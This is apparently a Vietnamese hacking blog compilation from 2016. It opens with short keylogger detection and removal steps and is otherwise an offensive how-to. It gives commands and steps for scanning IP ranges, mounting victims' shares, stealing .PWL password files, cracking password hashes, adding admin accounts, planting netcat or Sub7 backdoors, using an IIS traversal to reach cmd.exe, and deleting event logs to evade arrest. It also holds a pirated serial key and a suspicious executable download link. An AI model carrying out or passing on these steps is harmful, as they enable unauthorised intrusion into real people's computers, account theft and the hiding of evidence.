18 March 2016

Keylogger Và Troijan Virus Hack



Công dụng

Phần mềm và công dụng
1. Ent3 (essential nettools): dò tìm xâm nhập máy tính(khi biết ip)
2. Passwordspro: giải mã pass bị mã hóa
3. perfect keylogger: Tạo virus trojan gián điệp chụp lại ảnh của máy victim
4. antikey: phần mềm diệt virus trojan gián điệp
5. Cain: dò tìm ip để lấy username và pass
6. Havij: Dò tìm lỗi của cơ sở dữ liệu (SQL)


 2. Cách phòng chống. 
*******Bây giờ là cách phát hiện keylog không bị khóa acc thì chít*******
-. Với Perfect keylogger :
1. Vào mục Start -> Run gõ : cmd
2. Ở màn hình Dos gõ : tasklist /m bpkhk.dll
Nếu không có Keylogger bạn sẽ nhận được 1 thông báo lỗi :

INFO: No tasks running with the specified criteria.

Nếu có Keylogger màn hình sẽ hiển thị :

Image Name PID Modules Diễn giải
================ ==== ===== ====== =========
explorer*************** 468 bpkhk.dll <--- quen thuộc
DUMeter*************** 1444 bpkhk.dll <--- quen thuộc
ctfmon*************** 1548 bpkhk.dll <--- quen thuộc
acrotray*************** 1820 bpkhk.dll <--- quen thuộc
notepad*************** 1956 bpkhk.dll <--- quen thuộc
firefox*************** 2012 bpkhk.dll <--- quen thuộc
bdmcon*************** 1744 bpkhk.dll <--- quen thuộc
TOTALCMD*************** 2396 bpkhk.dll <--- quen thuộc
bpk*************** 1620 bpkhk.dll <--- nó đây rồi ( chứng tở máy bạn đã dính perfect key )

+. Với Easy Key:

1. Vào mục Start -> Run gõ : cmd
2. Ở màn hình Dos gõ : tasklist /m Ekey.dll
Nếu không có Keylogger bạn sẽ nhận được 1 thông báo lỗi :

INFO: No tasks running with the specified criteria.

Nếu có Keylogger màn hình sẽ hiển thị :
Image Name -------- PID -- Modules ----- Diễn giải
================ ==== ===== ========
TOTALCMD*************** ----- 2040 ----- ekey.dll <--- quen thuộc
Easy Keylogger*************** -- 2340 ----- ekey.dll <--- nó đây rồi ( máy bạn đã dính Easy Key)
****** Thêm Cách Diệt Cho Nó Đủ Bộ Nhá*********
+, Với Perfect Key

1. Vào mục Start -> Run gõ : cmd
2. Ở màn hình Dos gõ : taskkill /f /im bpk*************** /t
3. Tắt tất cả các chương trình đang chạy hiện thời (Explorer***************, bdswitch***************, DUMeter*************** ...)
4. Mở Explorer vào thư mục Windows\System32 xóa các tập tin bpk***************, bpkhk.dll, bpkwb.dll ...
Đã xong

+. Với Easy Key

1. Vào mục Start -> Run gõ : cmd
2. Ở màn hình Dos gõ : taskkill /f /fi "pid ge 2340" /im *
Đã xong
Lưu ý 1 chút đó là BPK có cho phép đổi tên các file bpk***************, các file .dll... nên khi các bạn không thấy file bpk*************** và bpk*.dll thì vẫn chưa thể yên tâm là trong máy ko có BPK

PHẦN MỀM CHỐNG VIRUS KEYLOG CỰC KỲ HIỆU QUẢ VÀ GỌN NHẸ - ANTI-KEYLOGGER
Anti-KeyLogger với những tính năng độc nhất vô nhị bao gồm hoạt động ở chế độ nền, tự động tắt kích hoạt mọi cơ chế ghi phím và còn ngăn chặn thành công tình trạng KeyLogger thâm nhập...
Phần mềm chốngVirus KeyLog cực kỳ hiệu quả và gọn nhẹ - Anti-KeyLogger
Trong thời gian gần đây, vấn nạn đạo tặc số đang có dấu hiệu leo thang, khiến cho cả người dùng máy tính lẫn các công ty chuyên viết phần mềm an ninh máy tính gặp phải không ít vất vả. Phổ biến nhất trong số này vẫn là sự tấn công của những trình ghi phím (chủ yếu là để lấy cắp password) thường được tin tặc lén lút cài đặt lên máy tính của người dùng trong lúc họ đang mải mê duyệt web.
Nhằm giúp người dùng máy tính có trình độ hiểu biết hạn chế về bảo mật, MyPlanet Software vừa công bố miễn phí công cụ phòng chống KeyLogger nhỏ nhất thế giới mang tên Anti-KeyLogger với những tính năng độc nhất vô nhị bao gồm hoạt động ở chế độ nền, tự động tắt kích hoạt mọi cơ chế ghi phím và còn ngăn chặn thành công tình trạng keylogger thâm nhập vào clipboard để ghi trộm những thông tin nhạy cảm. Ngoài ra, bạn cũng không cần phải cài đặt khi muốn sử dụng công cụ này.
Để kích hoạt công cụ này, bạn chỉ cần xả nén tập tin aklog.zip vừa được tải về rồi bấm đôi chuột vào tập tin aklog.exe. Hộp thoại MyPlanetSoft.com Anti-Keylogger sẽ xuất hiện. Hãy bấm nút OK hai lần để kích hoạt chương trình. Kể từ thời điểm này, chương trình sẽ hoạt động ở chế độ nền (ẩn) và tự động tắt kích hoạt mọi cơ chế ghi phím (nếu có) của những phần mềm gián điệp. Nếu muốn tắt kích hoạt Anti-Keylogger, bạn chỉ cần khởi động lại chương trình rồi bấm nút OK hai lần để hoàn tất mọi thay đổi.
25Jun.2010
Tác giả: admin   Phân loại:Hacking - Exploit   ThuộcTự viết       Lớn | Vừa | Nhỏ  
Sau khi nhiều người tìm ra pass của admin dạng Hash mà không biết làm gì ! vì không giải mả được nên dành chấp nhận về không !
Giải quyết vấn đề này tui viết bài hướng dẩn các bạn sữ dụng công cụ crack password tuyệt vời này PassWordPro 2.4.4.0
Công cụ này sẽ giúp bạn crack pass tất cả các dạng pass đã được mã hóa
Ở đây tui hướng dẩn crack pass của Vbb tất cả các Version
Trước hết bạn phải biết cách mã hóa của vbb là
Code:
$Pas=md5(md5($Password).$salt);
Trong đó Password là pass của người dùng còn salt trong vbb là random 3 ký tự bất kỳ
Pas sẽ được lưu trong cơ sở dữ liệu của trang web. vì dạng pass được mã hóa dưới dạng md5 thì hầu như chưa có thuật toán nào giải mã được, có chỉ là dò từng pass
Để giả mã pass trong vbb ta cần có $Pas và $salt hai cái này có thể tìm thấy trong data của Victim
Trích:
VD Tui có
$salt=’abc’;
$pas=’ac58bf0b0a8f3e79213389d1a9a4372c’;
right click chon add..
Hash nhập ac58bf0b0a8f3e79213389d1a9a4372c
salt nhập abc
Type of hash chọn: md5(md5($Pass).$salt)[php]
các thông tin khác với vbb thì không cần nhập
Nhấn add.
Sau đó thiết lập các tùy chọn cho công việc giả mã;
Ở đây có các kí tự: chử thường, chử hoa, số, kí tự đặc biệt..
Độ dài hay ngắn của pass: thông thường từ 4 đên 10 là đủ rồi
Tùy mức độ pass của victim dài hay ngắn mà thời gian tìm lâu hay không.
nếu pass có chử thường và hoa và số, có độ đài 10 ký tự tìm tốn khoản 20 năm với tốc độ tìm 6 000 000 đến 7 000 000 /giây
Hy vọng các bạn chờ được
Thành công đây
Một sô lưu ý:
Đối với các mã nguồn khác các bạn củng là tương tự, chọn đúng loại và có thời gian chờ thì sẽ racool
Xem thêm tại: http://longtu8x.net/blog/read.php?19#ixzz37kYrpf1B

 Phần mềm có thể dò password tất cả các kí tự từ A – Z, a – z, 1 – 9, các kí tự đặc biệt, space, printable...
Link download:
http://d.turboupload.com/d/2052487/Installsickpass.exe
serial: ARPR-83296730531875-CBBVYBXFEXDEVPMB
Hướng dẫn code giải mã pass bị mã hóa
Giả sử rằng bạn đã quên mật khẩu dùng để mã hoá dữ liệu thành “0x01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC”. Chúng ta có thể truy tìm lại được mật khẩu và dữ liệu đã bị mã hoá bằng thủ tục sau
use master 
go 
select getdate() as StartingTime 
go 
declare @myencryptedtext varbinary(max) 
set @myencryptedtext=0x01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC
print @myencryptedtext 
exec hack_encryption @encryptedtext=@myencryptedtext 
go 
select getdate() as EndingTime 
go
Kết quả
StartingTime 
----------------------- 
2007-12-18 18:24:10.843 
0x01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC 
This is the Encrypted text: MAK 
The actual data is :123456789 


Xâm nhập máy tính khi biết private ip (hay ip client)
1.Xâm nhập



Xâm nhập máy tính đang Online là một kỹ thuật vừa dễ lại vừa khó . Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách
đáng kể và những máy họ không share thì không thể xâm nhập được, do đó
nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một
cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân
không share là dùng chương trình DOS để tấn công .
Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu .
--->>Các bước thực hiện:
(1). Vào Start ==> Run gõ lệnh cmd .
(2). Trong cửa sổ DOS hãy đánh lệnh “net view ”
VD : c:\net view 203.162.30.xx
(3). Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh
tiếp lệnh
net use <ổ đĩa bất kỳ trên máy của bạn> : <ổ share của nạn nhân>
VD : c:\net use E : 203.162.30.xxC
(4). Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy
download chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai chương trình tương tự nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhânnhưng đối với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000 .
(5). Nếu máy của nạn nhân không có share thì ta đánh lệnh :
net use <ổ đĩa bất kỳ trên máy của bạn> : c$ (hoặc d$Nháy mắt"administrator"
+ VD : net use E : 203.162.30.xxC"administrator"

Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là
"administrator" .
2. ENT3
Essentail Nettools (ENT3)
Home: http://www.tamos.com/products/nettools/
Download: http://www.tamos.com/files/ent3.zip

sau khi unzip và setup , mở công cụ Essential NetTools và click vào phần NNBScan .
trong phần Starting Ip gõ 2 lớp đầu là 203.162 ( đây là lớp IP của việt nam) sau đó tuỳ thuộc vào muốn scan tỉnh nào mà bạn gõ lớp thứ 3 vào ( ví dụ của sài gòn thường co' lớp thứ 3 là 9,8,11,12,13,14... của hà nội thường có lớp thứ 3 là 19,25,27,29,31... còn lớp thứ 4 bạn gõ số 1Phần Ending Ip gõ 3 lớp đầu như trên nhưng lớp thứ 4 gõ số 255.
Sau khi scan xong phần RS các bạn sẽ thấy nhưng IP mà công cụ này scan được, nếu phần RS báo Yes thì có nghiã là máy tính đó có khả năng vào được còn No thì máy tính đó khó có khả năng vào được ,tìm một PC có khả năng vào được rôi click chuột phải vào Ip của PC đó, tiếp theo click vào open computer , rồi view ổ C:\ sau đó view tiếp thư mục windows :

sau khi view được thư mục windows, tìm những file .PWL, một máy có thể có nhiều file này ! cố gắng tìm hết chúng và coppy về máy tính của bạn ,có thể còn nhiều file .PWL khác trong thư mục windows này, bạn có gắng đừng bỏ xót !
Sau khi coppy về máy của bạn click trực tiếp vào ( chạy luôn bằng chương trình PWLTools ) , ví dụ với cái asean thấy màn hình báo như vậy là trong file này không có gì cả ! cố gắng thử với những file PWL khác, nếu may mắn bạn sẽ có account hiện ra thông thường khi view máy của ai đó đang online sẽ rất chậm, với 1 modem 56k motorola trong bạn phải mất 3 phút trung bình để view 1 thư mục và ngoài ra không làm được việc gì ! biết làm sao được vì thành công chỉ đến với những kẻ biết cách chờ đợi ! chúc các bạn hack vui vẻ
một số chú ý quan trọng khi hack acc dành cho những bạn đã biết hack :
0/ cách này chưa test với cilent ngoài hàng cafe internet
1/ khi view PC của ngưới khác máy của người đó sẽ chậm đi rất nhiều, do đó phải thao tác thật nhanh chóng hiệu quả, với những PC có nhiều file PWL nên chọn tất cả bằng phím Ctrl sau đó nhấn phím Ctrl+C để copy, minimize thư mục winsows của máy victim sau đó chọn 1 folder rồi nhấn Ctrl+V để paste ! những chú ý tuy rất nhỏ nhưng sẽ giảm được nhiều thời gian hơn, thử coi !
2/ nếu nhìn thấy victim không setup notron-antivirus bạn có thể coppy server của sub7 ( hay của một con trojan khác ) vào bất kì thư mục nào sau đó edit file AUTOEXEC.BAT sao cho khi khởi động máy sẽ load luôn cả server của sub7, sau đó scan bất kỳ lúc nào để đièu khiể máy victim bằng cilent
3/ khi được ngồi máy chủ của 1 cửa hàng internet nào đó có thể vào dialup để soi password connect bằng công cụ Revelation đã được giới thiệu trên site ( nếu có save password ) hoặc xài công cụ SHOWPASS nếu server xài windows 98,95,me, công cụ này cũng đã được giới thiệu trên website, hoặc cũng có thể cài backdoor vào
4/ 1 cách khác lấy luôn tất cả pw là xài công cụ pwltool demo ( chứ không phải PWLTools-6.51 đâu nha ) sau khi chạy công cụ này click vào tab tool -->Additional password , sau đó click tiếp tab Secret exploer để view tất cả connection

lick vào đây để lấy những công cụ cần thiết nha!
http://www.hvnh.edu.vn/modules.php?name=Forums&file=viewtopic&topic=48&forum=17
Xâm nhập vào máy tính của Victim đang Online bằng chương trình Essential NetTools :
- Đầu tiên các bạn phải Download chương trình Essential NetTools :
Essential Net Tools 3.0 và *** của nó
Rồi thực hiện các bước sau :
+ Giải nén files Essential Net Tools 3.0.zip bằng các công cụ giải nén như :
Winzip, Winrar...
Download tại : http://www.winzip.com/
Bước 1 : Thiết lập cấu hình
- Bạn vào trong Control Panel rồi vào Network
- Click vào nút Add rồi chọn phần Client
- Tiếp tục nhấn nút Add. Rồi chọn phần Microsoft
- Chọn phần Client for Microsoft Network
- Cuối cùng là OK
Bước 2 : Bắt đầu xâm nhập
+ Ngay phần NBscan
ngay phần" Starting IP":
Đánh vào IP của bạn. Để biết số IP của bạn thì vào Start --> Run rồi gõ : "winipcfg"
VD :
203.162.11.1
hoặc :
202.167.122.1
Còn phần Ending Ip :
203.162.11.255
hoặc :
202.167.122.225
+ Sau đó click chuột vào nút Start
+ Chờ sau giây lát !
Nó sẽ xuất hiện danh sách IP sau khi dò tìm !
+Ngay phần RS:
No : là không có xâm nhập vào được
Yes: là xâm nhập được (nhưng đôi khi thì không)
+ Nhấp chuột phải vào hàng mà có chữ "Yes"
- Nhấp vào phần "Open Computer"
+ Và sau đó các bạn có thể xâm nhập vào máy của victim được nhưng cũng có thể có mấy cái máy không xâm nhập vào được !
Nhưng đột nhập để làm gì ?
Chúng ta đột nhập để ăn cắp Acount và dữ liệu của victim !
Ắn cắp Password bằng cách lấy files PWL của victim trong :
C:/window/*.PWL
Rồi dùng công cụ PWL Tool để đọc được file đó
Các lệnh cơ bản xâm nhập máy tính
Phần 1 : Net
chỉ cần bạn có được User và Passwords của một IP nào trên Net...thế là bồ có thể kết nói một IPC$ rỗng rồi đấy....

bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456...IP : 127.0.0.1
cậu hãy mở trình Ms dos và gõ vào lệnh sau :
Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ rỗng với máy victtim
nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dụng
-------------------------
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe...
chúng ta cộng thệm môt user mới là heibai và password lovechina
Net user heibai lovechina / add
nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator
Net Localgroup Adminstrator heibai / add
-------------------------
trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )
Z là của mình...còn C$ là của Victim
Phần 2 : AT
thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ?
chúng ta phải dùng đến lệnh AT thôi.....
đầu tiên...chúng ta cần biết thời gian của đối phương
Net time \\127.0.0.1
bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1
AT \\127.0.0.1 12:3 nc.exe
ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi
* giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99
đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút
phần 3 : Telnet
đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok
Telnet 127.0.0.1 99
thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh...
Phần 4 : Copy
bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã....
chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :
Copy \\127.0.0.1\Admin$\repair\sam._c:\
phần 5 : Set
nếu bạn muốn *** một website......tất nhiến là phải mở port 80..nếu không thì cậu *** cho ai xem ?

đã tới lúc dùng lệnh Set rồi
sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi.....
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE
 CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`.....
phần 6 : Nbtstat
nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi...
* tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi

Nbtstat - A XXX.XXX.XXX.XXX
sau đây là kết quả tớ scan được.....
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
kết quả cho biết User là PENTIUMII

phần 7 : Shutdown
nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt
Shutdown \\127.0.0.1 t:20
20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức
phần 8 : Dir....
lệnh này không có gì để nói hết..chỉ dùng để view thôi.................
phần 9 : Del
lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ?
sau đây là những files nhật ký của Winnt
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
chỉ cần del hết là coi như xong
bổ xung thêm

+ Essential NetTools 3.0
+ PWLTools-6.51

sau khi unzip và setup , mở công cụ Essential NetTools và click vào phần NNBScan .
trong phần Starting Ip gõ 2 lớp đầu là 203.162 ( đây là lớp IP của việt nam )sau đó tuỳ thuộc vào muốn scan tỉnh nào mà bạn gõ lớp thứ 3 vào ( ví dụ của sài gòn thường co' lớp thứ 3 là 9,8,11,12,13,14... của hà nội thường có lớp thứ 3 là 19,25,27,29,31... còn lớp thứ 4 bạn gõ số 1
Phần Ending Ip gõ 3 lớp đầu như trên nhưng lớp thứ 4 gõ số 255.
Sau khi scan xong phần RS các bạn sẽ thấy nhưng IP mà công cụ này scan được, nếu phần RS báo Yes thì có nghiã là máy tính đó có khả năng vào được còn No thì máy tính đó khó có khả năng vào được ,tìm một PC có khả năng vào được rôi click chuột phải vào Ip của PC đó, tiếp theo click vào open computer , rồi view ổ C:\ sau đó view tiếp thư mục windows :
sau khi view được thư mục windows, tìm những file .PWL, một máy có thể có nhiều file này ! cố gắng tìm hết chúng và coppy về máy tính của bạn ,có thể còn nhiều file .PWL khác trong thư mục windows này, bạn có gắng đừng bỏ xót !
Sau khi coppy về máy của bạn click trực tiếp vào ( chạy luôn bằng chương trình PWLTools ) , ví dụ với cái asean thấy màn hình báo như vậy là trong file này không có gì cả ! cố gắng thử với những file PWL khác, nếu may mắn bạn sẽ có account hiện ra thông thường khi view máy của ai đó đang online sẽ rất chậm, với 1 modem 56k motorola trong bạn phải mất 3 phút trung bình để view 1 thư mục và ngoài ra không làm được việc gì ! biết làm sao được vì thành công chỉ đến với những kẻ biết cách chờ đợi ! chúc các bạn hack vui vẻ !
một số chú ý quan trọng khi hack acc dành cho những bạn đã biết hack :
0/ cách này chưa test với cilent ngoài hàng cafe internet
1/ khi view PC của ngưới khác máy của người đó sẽ chậm đi rất nhiều, do đó phải thao tác thật nhanh chóng hiệu quả, với những PC có nhiều file PWL nên chọn tất cả bằng phím Ctrl sau đó nhấn phím Ctrl+C để copy, minimize thư mục winsows của máy victim sau đó chọn 1 folder rồi nhấn Ctrl+V để paste ! những chú ý tuy rất nhỏ nhưng sẽ giảm được nhiều thời gian hơn, thử coi !
2/ nếu nhìn thấy victim không setup notron-antivirus bạn có thể coppy server của sub7 ( hay của một con trojan khác ) vào bất kì thư mục nào sau đó edit file AUTOEXEC.BAT sao cho khi khởi động máy sẽ load luôn cả server của sub7, sau đó scan bất kỳ lúc nào để đièu khiể máy victim bằng cilent
3/ khi được ngồi máy chủ của 1 cửa hàng internet nào đó có thể vào dialup để soi password connect bằng công cụ Revelation đã được giới thiệu trên site ( nếu có save password ) hoặc xài công cụ SHOWPASS nếu server xài windows 98,95,me, công cụ này cũng đã được giới thiệu trên website, hoặc cũng có thể cài backdoor vào
4/ 1 cách khác lấy luôn tất cả pw là xài công cụ pwltool demo ( chứ không phải PWLTools-6.51 đâu nha ) sau khi chạy công cụ này click vào tab tool -->Additional password , sau đó click tiếp tab Secret exploer để view tất cả connection


[Up]

Bổ xung thêm
Công cụ cần dùng: Ent3 và PWL 6.8, anh em có thể download ở đây.

http://www.soft4you.com/vitas/pwltoolr.htm
http://www.tamos.com

Nội dung chính của phương pháp: scan tất cả các máy tính đang Online có IP nằm lân cận với IP của máy mình, nếu máy nào có chia sẻ.
- Tìm IP của máy mình: bạn vào Run, gõ winipcfg -> lấy IP Address, VD đó là 203.210.128.25, bạn chỉ cần quan tâm đến 3 trường đầu của địa chi là 203.210.128
- Vào Ent3, chọn NBScan, trong ô Starting IP address gõ 203.210.128.1, còn trong ô Ending IP address gõ 203.210.128.255 rồi kích vào nút Start ---> Ent3 sẽ quét tất cả các máy đang Online tại thời điểm đó, ta chỉ quan tâm đến những máy có trường RS là Yes (vì đây là những máy có chia sẻ một cái gì đó). Mẹo nhỏ, bạn hãy kích chuột vào trường RS --> những máy có chia sẻ sẽ được gom lại thành một nhóm -->giúp bạn dễ nhìn hơn và không bị nhầm.
- Giả sử như máy có địa chỉ IP là 203.210.128.10 và nó có trường RS là Yes, bạn hãy mở một cửa sổ DOS Prompt và gõ chính xác như sau:
C:\copy\\203.210.128.10\c\windows\*.pwl c:\
câu lệnh này sẽ copy tất cả các file có đuôi PWL vào ổ C của máy mình, câu lệnh này chỉ mất tối đa 40s để biết kết quả là có được hay không (cách thông thường của bạn là mất 9 minute)
Nếu mà copy được thì bạn cần copy thêm file system.ini, (tầm quan trọng của file này sẽ được nói đến sau). Cú pháp:
C:\copy\\203.210.128.10\c\windows\system.ini c:\
- Nếu muốn tăng tốc độ săn Acc, bạn nên mở 2 hoặc 3 cửa sổ DOS Prompt để copy cùng một lúc.
- Giả sử bạn copy được file "Vidu.PWL", để biết được Username và Pass của victim bạn cần dùng công cụ PWL Net Tool 6.8. Công cụ này đòi hỏi bạn phải biết được Username của file "Vidu.PWL",
Lúc này bạn phải mở file system.ini đã copy ở trên và search từ khoá " PWL ", giả sử kết quả thu được là: "ABC=C:\windows\ABC.PWL" thì username ở đây chính là ABC. Bạn điền ABC vào ô username rồi kích chuột vào nút Search Password Fast --> OK
- Nói ra thì dài dòng nhưng toàn bộ công việc trên bạn chỉ cần mât 5 minutes là thực hiện xong.
- Nếu bạn muốn hack được card FPT hoặc thuê bao FPT thì bạn phải dùng chính card FPT hoặc thuê bao FPT trong khi scan IP (IP của nó là 210.245.xxx.xxx). Còn nếu bạn muốn hack 1260 prepair, thuê bao 1260 (IP của nó là 203.210.xxx.xxx), Netnam, .... thì cũng tương tự như vậy .
- Bạn ở địa điểm nào (HN, HCM...) thì hầu như chỉ hack được Acc của người ở địa điểm đó, do đó nếu member nào ở HCM thì hãy chịu khó hack Acc để trao đổi với anh em.
- Thêm mẹo nhỏ rất quan trọng đến tốc độ săn Acc đó là khi đang ở cửa sổ DOS Prompt
C:\
giả sử câu lệnh trước của bạn là
C:\copy\\203.210.128.10\c\windows\*.pwl c:\
thì bạn chỉ cần nhấn phím mũi tên lên thì nó sẽ hiện lại câu lệnh y hệt như câu lệnh trước của bạn, đó là:
C:\copy\\203.210.128.10\c\windows\*.pwl c:\
tác dụng của việc này:
khi bạn gõ C:\copy\\203.210.128.10\c\windows\*.pwl c:\ mà không copy được
cái gì, thì bạn chỉ cần nhấn phím mũi tên lên rồi thay đổi một chút trong địa chỉ IP là ta đã có một câu lệnh mới, rất nhanh mà không cần phải gõ lại dài dòng như trên .





 Tìm hiểu về mạng
nền tảng mạng, lập trình hệ thống, sau đó học thêm các phương thức thâm nhập căn bản.
mỗi máy tính có duy nhất một địa chỉ MAC
- Trang tìm vị trí, id: http://whois.domaintools.com
- IP Add = địa chỉ nhà 
Nhà thì lúc nào cũng khóa cửa => xâm nhập <=> phải mở được khóa 
1. Hợp lệ : Có chìa khóa do chủ nhà cấp <=> Username & Pass 
2. Bất hợp lệ : Cạy cửa <=> bẻ khóa 
a. Xác định rõ kiến trúc nhà xem có bao nhiêu cửa, gỗ hay bêtông, có lỗ thủng nào không, cửa sổ có khóa không để chui vào <=> Xác định HĐH hệ thống = quét Banner, tìm các lỗ hổng bảo mật trên mạng xem đã fix chưa (theo từng hệ thống khác nhau) 
Nếu Admin làm biếng chưa fix => May mắn, cứ thế mà chui lỗ chó vào. 
Nếu đã fix các lỗi => chỉ còn cách bẻ ổ khóa mà vào 
b. Xáx định rõ loại ổ khóa cần bẻ: 
Bảo mật kém : Nó xài khóa TQ, cứ lựa đại chìa có sẵn mà kiểm thử <=> Admin lơ là xài pass dễ đoán wa'. (sử dụng Tool quét pass theo Dictionary) 
Bảo mật tốt : Sử dụng khóa tốt, nhiều lớp cửa, có bầy chó Becgiê canh chừng, hệ thống hồng ngoại.... hic <=> Admin đã điều chỉnh các thông số default, pass khó đoán và được mã hóa tốt, sử dụng firewall nhiều tầng, hệ thống phát hiện xâm nhập IDS.... => |o| he he 
Nếu kỹ năng + kỹ thuật tốt mà chui vào được => Muốn đập phá cứ đập phá (del data, deface), muốn chôm đồ cứ chôm đồ(copy data), muốn làm nơi ăn nhậu cứ ăn nhậu (bruteforce)..... (C15 tóm cổ). 
Nếu không muốn bị tóm thì đừng phá phách. 
Người thông minh: Lặng im quan sát, khi rời khỏi lau sạch dấu vết (xóa dấu chân, dấu vân tay) <=> xóa tất cả log có liên quan trong hệ thống. Đục 1 lỗ phía sau tường để sau này muốn vô ngủ không cần phải chìa khóa (cài Backdoor Trojan mở port để có thể Telnet) hoặc tạo cho mình một chìa khóa hợp lệ (add Account của mình vào hệ thống). 
Kẻ lóc chóc: quậy phá tùm lum, để dấu vết tá lả cho C15 túm cổ. 
Kỹ năng cần có: 
1. Hiểu biết cặn kẽ về hệ thống và các dịch vụ trên hệ thống (tối thiểu Win và Linux) 
2. Hiểu rõ về TCP/IP cũng như các Protocol khác 
3. Có kỹ năng lập trình
